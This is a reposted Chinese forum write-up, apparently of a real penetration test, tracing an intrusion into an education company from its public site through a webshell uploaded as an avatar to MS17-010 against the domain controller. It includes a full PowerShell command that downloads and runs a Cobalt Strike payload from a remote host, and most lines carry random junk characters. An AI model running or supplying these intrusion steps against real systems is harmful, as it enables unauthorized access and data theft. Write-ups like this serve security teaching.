|
7 z( V) ?! S! J 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
- i- t2 _: m9 Z, a5 B( A9 `
( |9 o) J+ e. ^ R8 m
; } i$ T/ p0 U& N8 L' P# h
+ @+ D" F1 Q9 h4 e' @ - |# t9 c" s2 l* a7 w1 w
* g$ k6 b5 W- P4 r2 T. I 正文; x2 J0 t6 U9 Z( Z7 i/ j) T1 Z; }
( U/ a; J& z' ]7 v+ u3 Q3 {
' s0 E' W* d+ @. i% z
y; V1 o) ]9 Z+ Y
# C; w$ b0 Y' E3 V$ h$ E
9 @/ n7 a& j- Y2 A6 m+ Z2 M# h" V! ^ 目标:www.xxxx.com(一家教育机构)
( s' O8 ?" f6 m, G打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: G: Y( y e7 p9 a1 g) s- ~
% W* L: b& l$ _! U a7 Y+ n) t9 y9 _& m) q: d2 n1 }6 \% O% }/ z
 " E% f5 J4 n1 R& h7 R) b& ~
) p6 P, Z Y2 `! Z1 X
) G/ t7 [! [+ i& P9 g" o 进行了简单的信息搜集
5 c2 l; I+ d% t/ M2 p( A
4 d) U" ]+ [' u' B
" H" _" e3 h1 @6 \) Q7 d
7 e6 l0 ?0 R( S; N
- ^1 l' m6 d% ~& @1 [" ] 子域名搜集8 [7 w+ [0 _3 y! R. j
6 q& Q4 o9 S, n9 N
! s/ s1 }; Z; |1 {1 {/ R 
6 w$ w, \8 a) e 3 l) f4 h7 U) r# A! K. Z' z8 H7 H
) d: J9 T& A7 x7 ?( L
fofa找资产
, k4 J- d; F9 p
) d# d1 B0 H# C7 j$ t# Q6 L. o; \" C0 D) j {& O: T/ r0 d
# O: U9 H7 K5 H7 L0 c' b! n. s* M0 w3 I$ i
 5 ?; T/ \# k" j
1 C6 V/ L% D% E+ J# l6 U, }0 D& f/ J' X/ q) x/ ~0 U! b
一共七个资产。去重之后只有两个。
& c) |# _4 B$ _5 u# R2 {3 ?
5 H v7 x" a: A& e* T9 r2 c" |
4 h) Y$ J1 q }8 F+ R
7 \$ i5 m0 Z4 W- [6 V9 \. I% c( ~0 O9 w0 V" E- h
目录探测) d- T, }9 T! D
6 s* ]8 l" t) n# z4 u
" j% C) @- H) d) i9 h; ~& M
 Y v0 [+ u8 Z
8 p2 P6 `, L/ s( \/ f2 D8 z0 b
/ j+ e( K. X9 h8 b7 c
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 o$ Q* T/ w g, F) T4 c
7 `0 y5 z9 G5 G) p* n
3 S5 Q6 ^' h% ~1 x+ u1 o; q
6 B1 f. U% B5 C1 p! i$ v; g8 j
- Y$ S4 N5 L. d8 m% U 我又尝试了通过修改返回包来绕过登录界面8 Y+ W" i' q8 _/ R# t) S S; g
4 N5 J# c( u0 g& X2 e7 C$ ]
+ J4 Z. p9 g! ~) s& Z" r& U  0 a4 B% |+ ^/ E
" m1 B7 c. g, F9 u+ q q5 \7 q& T
& _* A7 ^& K) l ?' Q1 z 还是不行,尝试注入无果7 A% G( d: _6 y1 |# H4 ~
5 p, w: |* P5 c# ~. ^
% i" c- f0 |, M6 ~! D& P% V! {$ |) \& L
, |& k0 U! _# o! F ' [1 K0 e4 ^, c! p
( H3 B2 _, m( J+ H) ~+ f
不过我目录探测出了一处Spring信息泄露
9 y1 O7 q, ?3 ~, a0 Y6 e
3 K2 Y2 }5 o3 S; o& \
8 Q; h+ R- t8 m' H1 E& ? $ o) v2 Q5 K. z1 l4 x4 c
# Y; B* m' _8 U8 [2 O 
7 F* Z) q4 j$ q( b0 v8 h5 g/ V
! R; { C k& x' M' o3 @, T- K( g5 b& O$ A1 C3 k
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录: @+ W8 g$ q7 @ u; E
8 s+ R. S% h7 K+ x: U
- ?: ]9 r' p$ u2 \; w  5 ^2 B; S5 s6 ^/ j2 F! O* ~9 M3 c! e
: ~+ @: Z) H; X1 q8 R# T
" v( Z" |( K( l" o1 u& p 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。0 }5 |% ^: ~" g5 \; T" Y
- H% q7 R, ]' N1 Q6 `
% Q. Y5 {: h. f, A' Z; w3 d% f 
5 r7 O! N% ?; B; ]2 r 6 i7 f% Y" o# @+ r& ~5 ]
5 J3 N* w- q! n/ Z
获取有些师傅到这一步就手机抓包电脑测了。
7 R0 _1 z6 b% P
9 t# V4 [4 a' {# O/ g$ x& |0 t1 M& j" a$ a7 Q6 f3 u
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。: Y: U$ Y6 \4 K$ J! ~3 Y
% p. l: i$ J: k/ X7 {5 @4 C+ p$ w
3 t0 d, @' B& ]' P. [+ M# Z 其中在一个公众号发现了小程序,可以进行注册。9 O$ l$ R2 b9 F# O. w& Y9 i
- D: s2 y6 D$ o2 D/ B# r+ c% j, A0 R; h( u
看到了头像上传,尝试上传获取WebShell- ?. N, q& B, J8 u- C
" L }# N, ] Q e7 |6 ]# |6 J) S5 T2 A
9 Z) d, I J# h# f4 K' o+ G
4 x" W/ |/ @; H- V! a Q6 E" _( a% I" S$ ], {3 f+ J2 q; m
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
$ ]% J* {: d4 Y1 H/ L4 p' @
- f" r9 y2 z% _' K3 y
" w% B% N" l0 n2 `$ n  ! E6 q9 H) m. C* q9 E: V/ C
3 W5 v% ^/ B7 [( `5 J0 }
( A1 e; q* ?) R: j9 S5 a1 c c! Q 然后上了大马& i: p S% ]2 O. k& Q$ U: h
: T7 f$ m+ \ C) e" v4 L: {
# [' z, ?. f/ C- Q" d 
* j8 G5 C' @, H/ [ , G+ O+ Z0 Y# g1 D3 I1 }
5 W" w" I" p, r/ s! N+ Y# x
+ p: d# f c o6 s# }. C g9 {% C6 ?; O2 M* T
0 i8 U. b s9 e 通过翻找文件发现数据库账号密码
, ]4 `! K8 F7 v# V1 u- B6 I! X
8 a( r2 U4 e2 h$ ?1 j; |+ I, q/ m8 J# @8 g' g
 ' ^# f6 s# ?% s: L# g+ f' D5 h- M
5 x( h: y0 ?, g; X! E7 L" T$ m# V
; }6 d. n6 x, Y- ]% N --内网渗透( x1 w& c! Q8 y: y
D+ y3 c- y/ k- o
9 a8 j" P3 j6 v 直接通过powershell执行 cs上线- ]$ L( M( h0 M! L, Q! P
- J$ x1 H+ b/ F/ ?# F* V4 t
2 ^9 Y& q7 ^2 H) z7 K L
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"$ F2 G% `* `& h6 Q* m
. m( M. u* Z: c" y7 I) p9 _% f; T4 S" L: ?2 [
2 K" L% a. s; X- t
# r. ~1 N0 s5 {3 }! D6 z
0 ?( w/ e$ a2 U5 I$ k8 U7 S 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破5 _# N% H. b$ F; P' B2 l
; @* i& F* X7 U5 A% x0 S
% d) u o8 O3 t" M: ]& r2 o7 B# j* w
 - b3 I! x, ?1 e7 _& n- \5 D3 i) |
. P. y: M7 H( V% o; C
1 N- A0 C! h" [ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
( g' C/ L$ h. V# t% J7 t6 C5 a
& |- d D/ o; p
5 c1 |# B6 p& W1 M( e4 q5 L+ ]* C3 g6 ]6 t$ u
6 ^& z8 P, u5 v& x1 A1 D# v" Z5 J" l7 e: a# y
 ' G& q8 q6 ]: T/ M6 L! D3 R7 p
; O. h& r1 f+ ^4 o9 W+ p
7 N0 ?) O _: @' ^/ j- r: g1 e
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ T: W9 P p4 ~/ V! ]
% C* C' J, V+ O- ]0 y9 V3 y* |
1 v: W4 ?3 b; |+ ]* O: ^ 2 U( h$ c2 a* _8 G
, \& q! q6 J* O# g" y2 K4 ^$ R3 |
7 p: H: m c5 @6 {
( H; B2 s8 U: j6 e: h; m2 N6 _, r _4 X' l! N
9 G5 S' Y; }/ o5 E4 ~0 N
+ [* ]% C) n( j0 j/ F- Q
8 Q7 w7 z2 w3 p- T& t
3 A: }! r% S! e4 N! \7 D7 V0 D3 Q3 v, |1 z& \5 E; Q
; \7 b+ M) e) Q( Z+ W4 F & M! [; g4 R; t: H7 A
( t- p$ d+ f: A3 G! z* f' _" o! W 小结5 h+ O- _# E/ v3 D( _
7 _; n: u4 ~$ u ^
) d7 n' b0 P* Z
4 \6 H2 b5 ?* u/ r' I( t$ J8 b 7 ~; I# q) V) X, b
) `/ o, T+ O9 U" M8 Y; u: a# j
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
% K/ L0 [/ T. _& A+ h; R4 L : e; h6 W4 P8 c) _, L) G
. M& u7 R% [. l0 O) N/ L# I% Q
8 o6 T, c b3 j
0 F A) g' E5 D( D
4 N- U7 p) n+ ^+ V -
& f( `0 k, `2 r. P1 t
# `! E- w" Q- j2 f. a# g
- c( C9 c) d, J6 f- ?- ?
-
2 \ q7 g: T& u- |( j
s, \, [, V# f+ N' A2 K5 w& [
0 j2 R5 o6 {$ L5 }! W! Q: X 4 ~) c8 V1 e; j8 [, s) @+ \/ {# u
3 H! Q7 b7 w6 x/ H( R7 _% y 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html7 Q' e- a6 `2 o" K+ z5 i
/ B6 Q! k) M$ f5 F6 e7 X2 I( m9 M) S, L
6 D3 z- w2 @) C9 g! Z6 W9 L3 N. j. b
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对